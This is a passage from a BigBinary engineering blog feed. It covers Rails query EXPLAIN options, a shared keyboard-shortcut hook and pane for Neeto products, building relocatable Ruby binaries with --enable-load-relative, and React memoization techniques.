onlyplanned. 
Then actual run time statistics are added to the display, including thetotal elapsed time expended within each plan node and the total number of rowsit actually returned.</p><pre><code class="language-ruby">Service.where('age &gt; ?', 25).joins(:user).explain(:analyze)</code></pre><pre><code class="language-sql">EXPLAIN (ANALYZE) SELECT &quot;services&quot;.* FROM &quot;services&quot; INNER JOIN &quot;users&quot; ON &quot;users&quot;.&quot;id&quot; = &quot;services&quot;.&quot;user_id&quot; WHERE (age &gt; 25)                          QUERY PLAN-------------------------------------------------------------------------------------------------------------------------------------------------------- Hash Join  (cost=15.50..29.42 rows=103 width=232) (actual time=0.015..0.017 rows=0 loops=1)   Hash Cond: (services.user_id = users.id)   -&gt;  Seq Scan on services  (cost=0.00..13.10 rows=310 width=232) (actual time=0.012..0.012 rows=0 loops=1)   -&gt;  Hash  (cost=14.12..14.12 rows=110 width=8) (never executed)         -&gt;  Seq Scan on users  (cost=0.00..14.12 rows=110 width=8) (never executed)               Filter: (age &gt; 25) Planning Time: 0.915 ms Execution Time: 0.472 ms</code></pre><h4>VERBOSE</h4><p>The <code>verbose</code> option provides a more detailed output by including additionalinformation about each step in the execution plan. 
This includes statistics,cost estimates, and other relevant details.</p><pre><code class="language-ruby">Service.where('age &gt; ?', 25).joins(:user).explain(:verbose)</code></pre><pre><code class="language-sql">EXPLAIN (VERBOSE) SELECT &quot;services&quot;.* FROM &quot;services&quot; INNER JOIN &quot;users&quot; ON &quot;users&quot;.&quot;id&quot; = &quot;services&quot;.&quot;user_id&quot; WHERE (age &gt; 25)                          QUERY PLAN-------------------------------------------------------------------------------------------------------------------------------------------------------- Hash Join  (cost=15.50..29.42 rows=103 width=232)   Output: services.id, services.user_id, services.provider, services.uid, services.access_token, services.access_token_secret, services.refresh_token, services.expires_at, services.auth, services.created_at, services.updated_at   Inner Unique: true   Hash Cond: (services.user_id = users.id)   -&gt;  Seq Scan on public.services  (cost=0.00..13.10 rows=310 width=232)         Output: services.id, services.user_id, services.provider, services.uid, services.access_token, services.access_token_secret, services.refresh_token, services.expires_at, services.auth, services.created_at, services.updated_at   -&gt;  Hash  (cost=14.12..14.12 rows=110 width=8)         Output: users.id         -&gt;  Seq Scan on public.users  (cost=0.00..14.12 rows=110 width=8)               Output: users.id               Filter: (users.age &gt; 25)(11 rows)</code></pre><p>For more options available in PostgreSQL's EXPLAIN command, you can refer to the<a href="https://www.postgresql.org/docs/current/sql-explain.html">official documentation</a>.</p><p>Please check out this <a href="https://github.com/rails/rails/pull/47043">pull request</a>for more details.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How We standardized keyboard shortcuts in neeto]]></title>
       <author><name>Adil Ismail</name></author>
      <link href="https://www.bigbinary.com/blog/how-we-standardized-keyboard-shortcuts"/>
      <updated>2023-06-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-we-standardized-keyboard-shortcuts</id>
      <content type="html"><![CDATA[<p>We are building <a href="https://neeto.com">Neeto</a>, which is a collection of software.Keyboard shortcuts are a vital feature in any product that aims to improve userexperience. This blog will discuss how we standardized keyboard shortcuts acrossall Neeto products.</p><h2>The need for standardization</h2><p>Before we delve into how we've standardized keyboard shortcuts, it's importantto understand why we felt the need to do so. With multiple products under theNeeto ecosystem, each product team was implementing keyboard shortcutsfunctionality in their own way. This led to several problems:</p><ul><li><p>Cross-platform browser problems</p><p>Some products use <code>react-hotkeys</code> and some use <code>react-hotkeys-hook</code> forkeyboard shortcuts. And some create their custom hooks to handle keyboardshortcuts. However, the issue with all three approaches is that developers maymiss adding alternative hotkeys for operating systems that are different fromtheir development machine.</p><p>Furthermore, OS-based key translation behavior is inconsistent. For instance,one product may use the combination <code>option + s</code> for Mac and <code>alt + s</code> forWindows, while another product may use <code>option + s</code> for Mac and <code>ctrl + s</code> forWindows. Such inconsistencies degrade the user experience when users switchbetween operating systems.</p></li><li><p>Difference in UI for listing all shortcuts</p><p>Each product displayed shortcuts differently. Some used <code>react-hotkeys</code>built-in feature, while others created separate pages, modals, or tooltips toshow hotkeys. We wanted consistent behavior across all products in Neeto.</p></li><li><p>Difficulty finding and modifying registered hotkeys in the codebase</p><p>There was no standard convention on how/where to keep hotkey data. Someproducts have created a file to store all the hotkeys &amp; related info, and somehave their own conventions. 
When a developer is transferred from one product to another, they find it hard to adapt to the new conventions there. We wanted consistency in code structuring as well for all products in Neeto.</p></li></ul><p>To fix all these problems, we decided to bring in some code conventions and extract the common code to an npm package so that it can be reused in all products consistently.</p><h2>Components and hooks created for standardization</h2><p>We introduced a custom hook to run a specified function when the associated hotkey is fired. We also built a side pane component to display the list of all shortcuts.</p><h3>ShortcutsPane</h3><p>ShortcutsPane is a React component that displays all the keyboard shortcuts in the product. It belongs to the <code>neeto-molecules</code> package to enable code reuse. Users can open/close the shortcuts pane by clicking on the Keyboard shortcuts icon in the sidebar or pressing the hotkey <code>shift+/</code>.</p><p>This is how the pane looks:</p><p><img src="https://user-images.githubusercontent.com/29166133/234621934-09a75528-a1e7-4840-9fe9-fd51085a3a3c.png" alt="Pane image"></p><p>This is how the component is integrated into the products:</p><pre><code class="language-jsx">&lt;KeyboardShortcuts.Pane productShortcuts={SHORTCUTS} /&gt;</code></pre><p>We include <code>KeyboardShortcuts.Pane</code> in the <code>Main</code> component, which, as per Neeto standards, is the topmost parent component. Here, the <code>SHORTCUTS</code> constant contains the product-specific custom shortcuts. We have set a convention to define it in a file named <code>constants/keyboardShortcuts.js</code>. The <code>productShortcuts</code> prop is optional and can be omitted if a product doesn't have any custom shortcuts.</p><p>Given below is the sample structure of the <code>keyboardShortcuts.js</code> file.</p><pre><code class="language-js">export const CATEGORY_NAMES = {
  messenger: &quot;MESSENGER&quot;,
  settings: &quot;SETTINGS&quot;,
};

export const SHORTCUTS = {
  [CATEGORY_NAMES.messenger]: {
    addNewLine: {
      sequence: &quot;shift+return&quot;,
      description: &quot;Add new line&quot;,
    },
    sendMessage: {
      sequence: &quot;return&quot;,
      description: &quot;Send message&quot;,
    },
    addEmoji: {
      sequence: &quot;command+option+e&quot;,
      description: &quot;Add emoji&quot;,
    },
    closeConversation: {
      sequence: &quot;command+option+y&quot;,
      description: &quot;Close conversation&quot;,
    },
  },
  [CATEGORY_NAMES.settings]: {
    addPlaceholder: {
      sequence: &quot;command+option+t&quot;,
      description: &quot;Add placeholder&quot;,
    },
  },
};</code></pre><p>Because of this consistency, developers moving from one Neeto product to another find it easy to identify and make changes to the product shortcuts.</p><p>When <code>SHORTCUTS</code> is passed into <code>KeyboardShortcuts.Pane</code>, it will be merged with the common keyboard shortcuts list. The common list contains shortcuts like open/close pane, close modals, submit form, etc., that apply to all products. Developers have to pass the <code>hotkey</code> for macOS, and the component will take care of identifying the user's platform using <code>platform.js</code> and rendering the appropriate platform-specific keys. For example, <code>option</code> will be converted to <code>alt</code> for Windows users.</p><h3>useHotKeys hook</h3><p>We wanted a hook that combined the features of both <code>react-hotkeys</code> and <code>react-hotkeys-hook</code>.
We wanted all the features of <code>react-hotkeys-hook</code>, like its hook style and easy-to-use API, plus the <code>sequential</code> mode of the <code>react-hotkeys</code> package. So we went with building our own hook named <code>useHotKeys</code>. We added the hook to the package <code>@bigbinary/neeto-commons-frontend</code>. All our reusable hooks, common utility functions, configs, etc. reside in this package. Developers pass a hotkey, a handler function, and an optional configuration object to the hook.</p><p><code>useHotKeys</code> is built using the popular <a href="https://craig.is/killing/mice">mousetrap.js</a> package. <code>mousetrap.js</code> is a tiny library that helps handle keyboard shortcuts in an application.</p><p>Because of the following features of <code>useHotKeys</code>, we can handle most of the shortcut management cases for any application.</p><ul><li>It supports sequential hotkeys. For example, &quot;press s and then r&quot;.</li><li>It can bind simultaneous hotkeys. For example, &quot;press s and at the same time press r&quot;.</li><li>It can bind single hotkeys, e.g. <code>return</code>.</li><li>It auto-converts a hotkey based on the platform, e.g. <code>command</code> is converted to <code>ctrl</code> on Windows, and the user will only pass the hotkey for macOS.</li><li>It supports an <code>enabled</code> config which can be used to enable/disable the hotkey. By default, all hotkeys will be enabled.</li><li>It supports multiple modes of operation as explained below:<ul><li><code>default</code>: In the default mode, hotkeys won't be fired if the current focus is on an input field.</li><li><code>scoped</code>: The scoped mode is used to restrict a hotkey's handler to a specific DOM element, e.g. forms.</li><li><code>global</code>: global is similar to the default mode. The only difference is that it will fire even if the user is focused on an input field.</li></ul></li></ul><p>The following is an example of using the default mode. Here, the handler will be invoked whenever the user presses the close conversation hotkey:</p><pre><code class="language-jsx">useHotKeys(MESSENGER_SHORTCUTS.closeConversation.sequence, () =&gt;
  setConversationModalOpen(true)
);</code></pre><p>We define constants like <code>MESSENGER_SHORTCUTS</code> in the <code>constants/keyboardShortcuts.js</code> file to make it easier to access sequences and pass them to the <code>useHotKeys</code> hook. It would look something like this:</p><pre><code class="language-js">export const MESSENGER_SHORTCUTS = SHORTCUTS[CATEGORY_NAMES.messenger];</code></pre><p>The following is an example of using the scoped mode. When the mode is scoped, <code>useHotKeys</code> will return a React ref that we can attach to the desired element. The handler function will only be invoked when the user presses the hotkey while focused inside the form, e.g., the input element:</p><pre><code class="language-jsx">const formRef = useHotKeys(
  MESSENGER_SHORTCUTS.toggleModal.sequence,
  () =&gt; setIsModalOpen(isOpen =&gt; !isOpen),
  { mode: &quot;scoped&quot; }
);

return (
  &lt;div&gt;
    &lt;form ref={formRef}&gt;
      &lt;input type=&quot;text&quot; name=&quot;username&quot; /&gt;
    &lt;/form&gt;
  &lt;/div&gt;
);</code></pre><h3>usePaneState hook</h3><p>While rolling out these components to products, we noticed that it would be nice if some pages were styled differently when the pane is open. So, we added a hook, <code>usePaneState</code>, that tells whether the pane is open or not. Pages can use this hook to know the current status of the pane and apply styles accordingly.</p><p>Try out any of the <a href="https://neeto.com">neeto</a> products and see the keyboard shortcuts in action for yourself.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Using enable-load-relative flag in building Ruby binaries]]></title>
       <author><name>Vishal Yadav</name></author>
      <link href="https://www.bigbinary.com/blog/use-of-enable-load-relative-flag-in-building-ruby-binaries"/>
      <updated>2023-06-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/use-of-enable-load-relative-flag-in-building-ruby-binaries</id>
      <content type="html"><![CDATA[<p>I'm working on building <a href="https://neeto.com/neetoci">NeetoCI</a>, which is a CI/CD solution. While building precompiled Ruby binaries, we encountered some challenges. This blog post explores the problems we faced and how we solved them.</p><h2>Pre-compiled Ruby binaries</h2><p>Pre-compiled Ruby binaries are distribution-ready versions of Ruby that include optimized features for specific systems. These Ruby binaries save time by eliminating the need to compile Ruby source code manually. Pre-compiled Ruby binaries help users quickly deploy applications that use different versions of Ruby on multiple machines.</p><p><a href="https://rvm.io/">RVM</a> (Ruby Version Manager) is widely used for managing Ruby installations on Unix-like systems. RVM provides customized pre-compiled Ruby binaries tailored for various CPU architectures. These binaries offer additional features like readline support and SSL/TLS support. You can find them at <a href="https://rvm.io/binaries/">RVM binaries</a>.</p><h2>The need for pre-compiled Ruby binaries</h2><p><a href="https://www.neeto.com/neetoci">NeetoCI</a> must execute user code in a containerized environment. A Ruby environment is essential for running Ruby on Rails applications. However, relying on the system's Ruby version is impractical since it may differ from the user's required version. Although rbenv or RVM can be used to install the necessary Ruby version, this approach could be slow. To save time, we chose to leverage pre-compiled Ruby binaries.</p><p>As a CI/CD system, NeetoCI must ensure that all versions of Ruby that an application requires are always available. Hence, we decided to build our own binaries instead of relying on binaries provided by RVM. Also, this would allow us to do more system-specific optimizations to the Ruby binary at build time.</p><h2>Building pre-compiled Ruby binaries</h2><p>We built a Ruby binary following the <a href="https://github.com/ruby/ruby/blob/master/doc/contributing/building_ruby.md">official documentation</a>. We were able to execute it on our local development machines. But the same binary ran into an error in our CI/CD environment.</p><p><img src="/blog_images/2023/use-of-enable-load-relative-flag-in-building-ruby-binaries/failing-binary-error-image.png" alt="Bad Interpreter"></p><pre><code class="language-bash">$ bundle config path vendor/bundle
./ruby: bad interpreter: No such file or directory</code></pre><p>To debug the issue, we initially focused on <code>$PATH</code>. However, even after resolving the <code>$PATH</code> issues, the problem persisted. We conducted a thorough investigation to identify the root cause. Unfortunately, not much was written on the Internet about this error. There was no mention of it in the official <a href="https://github.com/ruby/ruby/blob/master/doc/contributing/building_ruby.md">Ruby documentation</a>.</p><p>As the next step, we decided to download the binary for version 3.2.2 from <a href="https://rvm.io/binaries/">RVM</a>.
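</p><p>As a quick check, any Ruby that can be executed will report the flags it was configured with via the standard <code>RbConfig</code> module. The following is a small sketch (not part of our build scripts) that can be used to compare a working binary against a failing one:</p><pre><code class="language-ruby"># Print the ./configure arguments that were baked into this Ruby at build time.
require 'rbconfig'

puts RbConfig::CONFIG['configure_args']</code></pre><p>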
While examining the configuration file, we noticed that the following arguments were used with the configure command during the Ruby binary build process:</p><pre><code class="language-bash">configure_args=&quot;'--prefix=/usr/share/rvm/rubies/ruby-3.2.2' '--enable-load-relative' '--sysconfdir=/etc' '--disable-install-doc' '--enable-shared'&quot;</code></pre><p>Here are the explanations of the configuration arguments:</p><ol><li><p><code>--prefix=/usr/share/rvm/rubies/ruby-3.2.2</code>: This specifies the directory where the Ruby binaries, libraries, and other files will be kept after the installation is done.</p></li><li><p><code>--enable-load-relative</code>: This specifies that Ruby can load relative paths for dynamically linked libraries. It allows the usage of relative paths instead of absolute paths when loading shared libraries. This feature can be beneficial in specific deployment scenarios.</p></li><li><p><code>--sysconfdir=/etc</code>: This argument sets the directory where Ruby's system configuration files will be installed. In this case, it specifies the <code>/etc</code> directory as the location for these files.</p></li><li><p><code>--disable-install-doc</code>: When this option is enabled, the installation of documentation files during the build process is disabled. This can help speed up the build process and save disk space, especially if you do not require the documentation files.</p></li><li><p><code>--enable-shared</code>: Enabling this option allows the building of shared libraries for Ruby. Shared libraries enable Ruby to dynamically link and load specific functionality at runtime, leading to potential performance improvements and reduced memory usage.</p></li></ol><p>In simpler terms, when the <code>--enable-load-relative</code> flag is enabled, the compiled Ruby binary can search for shared libraries in its own directory using the <code>$ORIGIN</code> variable.</p><p>When we built the binary in Docker, the <code>--prefix</code> we passed was something like <code>/usr/share/neetoci</code>, so the resulting binary had <code>/usr/share/neetoci</code> hard-coded in various places. When we downloaded this binary and used it in the CI environment, Ruby kept looking under <code>/usr/share/neetoci</code> to load its dependencies.</p><p>By enabling the <code>--enable-load-relative</code> flag while building the binary, Ruby will not use the hard-coded value. Rather, Ruby will use the <code>$ORIGIN</code> variable and will search for the dependencies in the directory mentioned in <code>$ORIGIN</code>.</p><p>This is particularly helpful when the Ruby binary is relocated to a different directory or system. By using relative paths with <code>$ORIGIN</code>, the binary can find its shared libraries regardless of its new location. Without this flag, shared libraries are loaded using absolute paths, which can cause issues if the binary is moved to a different location and cannot locate its shared libraries.</p><p>In our specific use case, where we create and download binaries in separate containers, we encountered an error due to the absolute paths. To overcome this, we enabled the <code>--enable-load-relative</code> flag. This allowed the binary to find its shared libraries successfully, and it worked as expected in our CI/CD environment.</p><p><img src="/blog_images/2023/use-of-enable-load-relative-flag-in-building-ruby-binaries/passing-ruby-binary-image.png" alt="Successful Build"></p>]]></content>
    </entry><entry>
       <title><![CDATA[React performance optimization - memoization demystified]]></title>
       <author><name>Abhay V Ashokan</name></author>
      <link href="https://www.bigbinary.com/blog/react-performance-optimization-memoization-demystified"/>
      <updated>2023-06-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/react-performance-optimization-memoization-demystified</id>
      <content type="html"><![CDATA[<p>When it comes to building fast React applications, performance is a top priority. Luckily, React has clever techniques built in that take care of performance optimizations automatically. In fact, React does most of the heavy lifting for you, so you can focus on building your app without worrying too much about performance tweaks. However, as your React application scales and becomes more complex, there are opportunities to further enhance its speed and efficiency.</p><p>In this blog, we will focus on how the memoization of components and proper code splitting help you squeeze the most out of your application. We assume that you have a high-level understanding of how <a href="https://courses.bigbinaryacademy.com/advanced-react-js/code-optimization/usecallback-hook">useCallback</a>, <a href="https://courses.bigbinaryacademy.com/advanced-react-js/code-optimization/react-memo">useMemo</a>, and <a href="https://courses.bigbinaryacademy.com/advanced-react-js/code-optimization/react-memo">React.memo</a> work. If so, let's jump right in.</p><h3>Initial setup</h3><p>We'll go through the process of building a website that helps teams manage and discuss customer feedback. The application contains a dashboard where different categories of feedback are organized. The user can easily navigate between each category and view all the feedback classified under it. It's important to note that, for the purpose of this blog, we will be focusing on building a dashboard prototype rather than a fully functional application, incorporating a significant amount of demo data.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/customer-feedback-dashboard.gif" alt="Customer feedback dashboard"></p><p>The dashboard consists mainly of four components. The <code>Header</code> component displays the category of feedback and also lets you easily navigate to other categories. The <code>Category</code> component displays all the feedback related to the selected category. On the right side, the <code>Info</code> section provides personalized details about the user who is currently logged in. All these parts are encapsulated in the <code>App</code> component, creating a cohesive dashboard.</p><p><strong>App.jsx</strong></p><p>The <code>App</code> component renders the <code>Header</code> and <code>Category</code> components corresponding to the selected category. For the sake of demonstration, we store all the dummy data in the <code>FEEDBACK_CATEGORIES</code> variable. By default, the first category is selected. We shall pass a <code>DEFAULT_USER</code> constant to render the <code>Info</code> component.</p><pre><code class="language-jsx">import React, { useState } from &quot;react&quot;;

import Category from &quot;./Category&quot;;
import { DEFAULT_USER, FEEDBACK_CATEGORIES } from &quot;./constants&quot;;
import Header from &quot;./Header&quot;;
import Info from &quot;./Info&quot;;

const App = () =&gt; {
  const [selectedCategoryIndex, setSelectedCategoryIndex] = useState(0);

  const totalCategories = FEEDBACK_CATEGORIES.length;
  const category = FEEDBACK_CATEGORIES[selectedCategoryIndex];

  const gotoNextCategory = () =&gt; {
    setSelectedCategoryIndex(index =&gt; (index + 1) % totalCategories);
  };

  const gotoPrevCategory = () =&gt; {
    setSelectedCategoryIndex(
      index =&gt; (index + totalCategories - 1) % totalCategories
    );
  };

  return (
    &lt;div className=&quot;flex justify-between&quot;&gt;
      &lt;div className=&quot;w-full&quot;&gt;
        &lt;Header
          gotoNextCategory={gotoNextCategory}
          gotoPrevCategory={gotoPrevCategory}
          title={category.title}
        /&gt;
        &lt;Category category={category} /&gt;
      &lt;/div&gt;
      &lt;Info user={DEFAULT_USER} /&gt;
    &lt;/div&gt;
  );
};

export default App;</code></pre><p><strong>Header.jsx</strong></p><p>The <code>Header</code> component renders the feedback title
and implements pagination for seamless navigation between feedback.</p><pre><code class="language-jsx">import React from &quot;react&quot;;

const Header = ({ title, gotoNextCategory, gotoPrevCategory }) =&gt; (
  &lt;div className=&quot;flex justify-between p-4 shadow-sm&quot;&gt;
    &lt;h1 className=&quot;text-xl font-bold&quot;&gt;{title}&lt;/h1&gt;
    &lt;div className=&quot;space-x-2&quot;&gt;
      &lt;button
        className=&quot;rounded bg-blue-500 py-1 px-2 text-white&quot;
        onClick={gotoPrevCategory}
      &gt;
        Previous
      &lt;/button&gt;
      &lt;button
        className=&quot;rounded bg-blue-500 py-1 px-2 text-white&quot;
        onClick={gotoNextCategory}
      &gt;
        Next
      &lt;/button&gt;
    &lt;/div&gt;
  &lt;/div&gt;
);

export default Header;</code></pre><p><strong>Category.jsx</strong></p><p>The <code>Category</code> component displays a list of feedbacks based on the selected category, facilitating a bird's-eye view of all the feedbacks.</p><pre><code class="language-jsx">import React from &quot;react&quot;;

const Category = ({ category }) =&gt; (
  &lt;div className=&quot;mx-auto my-4 w-full max-w-xl space-y-4&quot;&gt;
    {category.feedbacks.map(({ id, user, description }) =&gt; (
      &lt;div key={id} className=&quot;rounded shadow px-6 py-4 w-full&quot;&gt;
        &lt;p className=&quot;font-semibold&quot;&gt;{user}&lt;/p&gt;
        &lt;p className=&quot;text-gray-600&quot;&gt;{description}&lt;/p&gt;
      &lt;/div&gt;
    ))}
  &lt;/div&gt;
);

export default Category;</code></pre><p><strong>Info.jsx</strong></p><p>The <code>Info</code> component displays the information of the currently logged-in user.</p><pre><code class="language-jsx">import React from &quot;react&quot;;

const Info = ({ user }) =&gt; (
  &lt;div className=&quot;flex h-screen flex-col bg-gray-100 p-8&quot;&gt;
    &lt;p&gt;{user.name}&lt;/p&gt;
    &lt;p className=&quot;font-semibold text-blue-500&quot;&gt;{user.email}&lt;/p&gt;
    &lt;button className=&quot;text-end mt-auto block text-sm font-semibold text-red-500&quot;&gt;
      Log out
    &lt;/button&gt;
  &lt;/div&gt;
);

export default Info;</code></pre><p>Here is a <a href="https://codesandbox.io/s/react-performance-optimization-memoization-demystified-initial-xbu74g?file=/src/App.jsx">CodeSandbox link</a> for you to jump right in and try out all the changes yourselves.</p><h3>Profiling and optimizing with React profiler</h3><p>Now let's have a look at what the React Profiler has to say when we click on the &quot;Next&quot; and &quot;Previous&quot; buttons to navigate between the different feedbacks.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/react-profiler-initial-code.gif" alt="React profiler for initial code"></p><p>Clearly, every component is re-rendered whenever the user navigates to another feedback. This is not ideal. We can argue that the <code>Info</code> component need not be re-rendered since the user information stays constant across every render. Let us wrap the default export of the <code>Info</code> component with <code>React.memo</code> and see how it improves the performance.</p><pre><code class="language-jsx">export default React.memo(Info);</code></pre><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/react-profiler-memoized-info.gif" alt="React profiler for memoized Info component"></p><p>It's now clear that subsequent renders use the cached version of the <code>Info</code> component, boosting the overall performance.</p><p>Let's now explore how we can improve the performance of the <code>Header</code> component further. There is no point in memoizing the <code>Header</code> component itself since the <code>title</code> is updated whenever we navigate to a new category.
We can see that the pagination buttons need not re-render whenever we navigate to a new category. Hence, it is possible to extract these buttons into their own component and memoize it to prevent these unnecessary re-renders.</p><p><strong>Header.jsx</strong></p><pre><code class="language-jsx">import React from &quot;react&quot;;

import Pagination from &quot;./Pagination&quot;;

const Header = ({ title, gotoNextCategory, gotoPrevCategory }) =&gt; (
  &lt;div className=&quot;flex justify-between p-4 shadow-sm&quot;&gt;
    &lt;h1 className=&quot;text-xl font-bold&quot;&gt;{title}&lt;/h1&gt;
    &lt;div className=&quot;space-x-2&quot;&gt;
      &lt;Pagination
        gotoNextCategory={gotoNextCategory}
        gotoPrevCategory={gotoPrevCategory}
      /&gt;
    &lt;/div&gt;
  &lt;/div&gt;
);

export default Header;</code></pre><p><strong>Pagination.jsx</strong></p><pre><code class="language-jsx">import React from &quot;react&quot;;

const Pagination = ({ gotoNextCategory, gotoPrevCategory }) =&gt; (
  &lt;&gt;
    &lt;button
      className=&quot;rounded bg-blue-500 py-1 px-2 text-white&quot;
      onClick={gotoPrevCategory}
    &gt;
      Previous
    &lt;/button&gt;
    &lt;button
      className=&quot;rounded bg-blue-500 py-1 px-2 text-white&quot;
      onClick={gotoNextCategory}
    &gt;
      Next
    &lt;/button&gt;
  &lt;/&gt;
);

export default React.memo(Pagination);</code></pre><p>This did not solve the problem. In fact, <code>React.memo</code> did not prevent any unnecessary re-renders. By definition, <code>React.memo</code> lets you skip re-rendering a component when its props are unchanged. After close inspection, you will understand that the references to the <code>gotoNextCategory</code> and <code>gotoPrevCategory</code> functions get updated whenever the <code>App</code> component re-renders. This causes the <code>Pagination</code> component to re-render as well. Here we should use the <code>useCallback</code> hook to cache the function references before passing them as props. This maintains the referential equality of the functions across renders and lets <code>React.memo</code> do its magic.</p><p><strong>App.jsx</strong></p><pre><code class="language-jsx">// Rest of the code

const App = () =&gt; {
  // Rest of the code

  const gotoNextCategory = useCallback(() =&gt; {
    setSelectedCategoryIndex(index =&gt; (index + 1) % totalCategories);
  }, []);

  const gotoPrevCategory = useCallback(() =&gt; {
    setSelectedCategoryIndex(
      index =&gt; (index + totalCategories - 1) % totalCategories
    );
  }, []);

  // Rest of the code
};

export default App;</code></pre><p>Now, you may use the profiler to verify that the <code>Pagination</code> component is not re-rendered unnecessarily.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/react-profiler-memoized-pagination.gif" alt="React profiler with memoized pagination"></p><p>Let us now introduce a new feature. The users should be able to filter the feedback in a particular category based on a search term.
We shall modify the <code>Category</code> component to incorporate it.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/feedback-search-feature.gif" alt="Feedback search feature"></p><p><strong>Category.jsx</strong></p><pre><code class="language-jsx">import React, { useState } from &quot;react&quot;;

const Category = ({ category }) =&gt; {
  const [searchTerm, setSearchTerm] = useState(&quot;&quot;);

  const filteredFeedbacks = category.feedbacks.filter(({ description }) =&gt;
    description.toLowerCase().includes(searchTerm.toLowerCase().trim())
  );

  return (
    &lt;div className=&quot;mx-auto my-4 w-full max-w-xl space-y-4&quot;&gt;
      &lt;input
        autoFocus
        className=&quot;outline-gray-200 w-full border p-2&quot;
        placeholder=&quot;Search feedbacks&quot;
        value={searchTerm}
        onChange={e =&gt; setSearchTerm(e.target.value)}
      /&gt;
      {filteredFeedbacks.map(({ id, user, description }) =&gt; (
        &lt;div key={id} className=&quot;rounded shadow px-6 py-4 w-full&quot;&gt;
          &lt;p className=&quot;font-semibold&quot;&gt;{user}&lt;/p&gt;
          &lt;p className=&quot;text-gray-600&quot;&gt;{description}&lt;/p&gt;
        &lt;/div&gt;
      ))}
    &lt;/div&gt;
  );
};

export default Category;</code></pre><p>From the above code, it is very clear that the individual feedback need not be re-rendered every time the search term is updated. Hence, it would be a good idea to extract it into a <code>Card</code> component and wrap it with <code>React.memo</code>.</p><p><strong>Category.jsx</strong></p><pre><code class="language-jsx">import React, { useState } from &quot;react&quot;;

import Card from &quot;./Card&quot;;

const Category = ({ category }) =&gt; {
  const [searchTerm, setSearchTerm] = useState(&quot;&quot;);

  const filteredFeedbacks = category.feedbacks.filter(({ description }) =&gt;
    description.toLowerCase().includes(searchTerm.toLowerCase().trim())
  );

  return (
    &lt;div className=&quot;mx-auto my-4 w-full max-w-xl space-y-4&quot;&gt;
      &lt;input
        autoFocus
        className=&quot;outline-gray-200 w-full border p-2&quot;
        placeholder=&quot;Search feedbacks&quot;
        value={searchTerm}
        onChange={e =&gt; setSearchTerm(e.target.value)}
      /&gt;
      {filteredFeedbacks.map(({ id, user, description }) =&gt; (
        &lt;Card key={id} user={user} description={description} /&gt;
      ))}
    &lt;/div&gt;
  );
};

export default Category;</code></pre><p><strong>Card.jsx</strong></p><pre><code class="language-jsx">import React from &quot;react&quot;;

const Card = ({ user, description }) =&gt; (
  &lt;div className=&quot;w-full rounded px-6 py-4 shadow&quot;&gt;
    &lt;p className=&quot;font-semibold&quot;&gt;{user}&lt;/p&gt;
    &lt;p className=&quot;text-gray-600&quot;&gt;{description}&lt;/p&gt;
  &lt;/div&gt;
);

export default React.memo(Card);</code></pre><p>If the number of feedbacks is too large, the calculation of <code>filteredFeedbacks</code> will become expensive. We need to traverse all the comments one by one and then perform custom search logic on each comment object. We can use the <code>useMemo</code> hook to cache the results, preventing the same computation across renders and boosting the performance further.</p><p>Let us check the React profiler one last time.
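</p><p>As a sketch, the memoized version of the filtering inside <code>Category</code> could look like the following (assuming the same <code>category</code> prop and <code>searchTerm</code> state as above, with <code>useMemo</code> imported from React):</p><pre><code class="language-jsx">// Recompute filteredFeedbacks only when the feedback list or the search term changes.
const filteredFeedbacks = useMemo(
  () =&gt;
    category.feedbacks.filter(({ description }) =&gt;
      description.toLowerCase().includes(searchTerm.toLowerCase().trim())
    ),
  [category.feedbacks, searchTerm]
);</code></pre><p>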
Clearly, only the <code>Category</code> component re-renders with the new changes, taking the rest of the results from the cache.</p><p><img src="/blog_images/2023/react-performance-optimization-memoization-demystified/react-profiler-search-feature.gif" alt="React profiler useMemo and memoized Card"></p><p>To enhance the overall user experience, it's important to reset the search term whenever users navigate to a new category. This can be easily achieved by passing a <code>key</code> prop to the <code>Category</code> component. React will maintain separate component trees for each category, ensuring that the search functionality starts anew in each category.</p><pre><code class="language-jsx">// Rest of the code

const App = () =&gt; {
  // Rest of the code

  return (
    &lt;div className=&quot;flex justify-between&quot;&gt;
      &lt;div className=&quot;w-full&quot;&gt;
        &lt;Header
          title={category.title}
          gotoNextCategory={gotoNextCategory}
          gotoPrevCategory={gotoPrevCategory}
        /&gt;
        &lt;Category key={category.id} category={category} /&gt;
      &lt;/div&gt;
      &lt;Info user={DEFAULT_USER} /&gt;
    &lt;/div&gt;
  );
};

export default App;</code></pre><h3>Wrapping up</h3><p>By breaking down components and utilizing memoization, we have improved the performance of our app significantly. The React Profiler has been instrumental in identifying areas for optimization and validating the effectiveness of our enhancements. With these techniques, you can now build faster and more responsive React applications. Apply these learnings to your projects and elevate your React development skills.</p><p>Here is a <a href="https://codesandbox.io/s/react-performance-optimization-memmoization-demystified-xef0q9">CodeSandbox link</a> of the optimized website for you to play with.</p>]]></content>
    </entry><entry>
       <title><![CDATA[NeetoDeploy: Zero to One]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/neeto-deploy-zero-to-one"/>
      <updated>2023-06-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/neeto-deploy-zero-to-one</id>
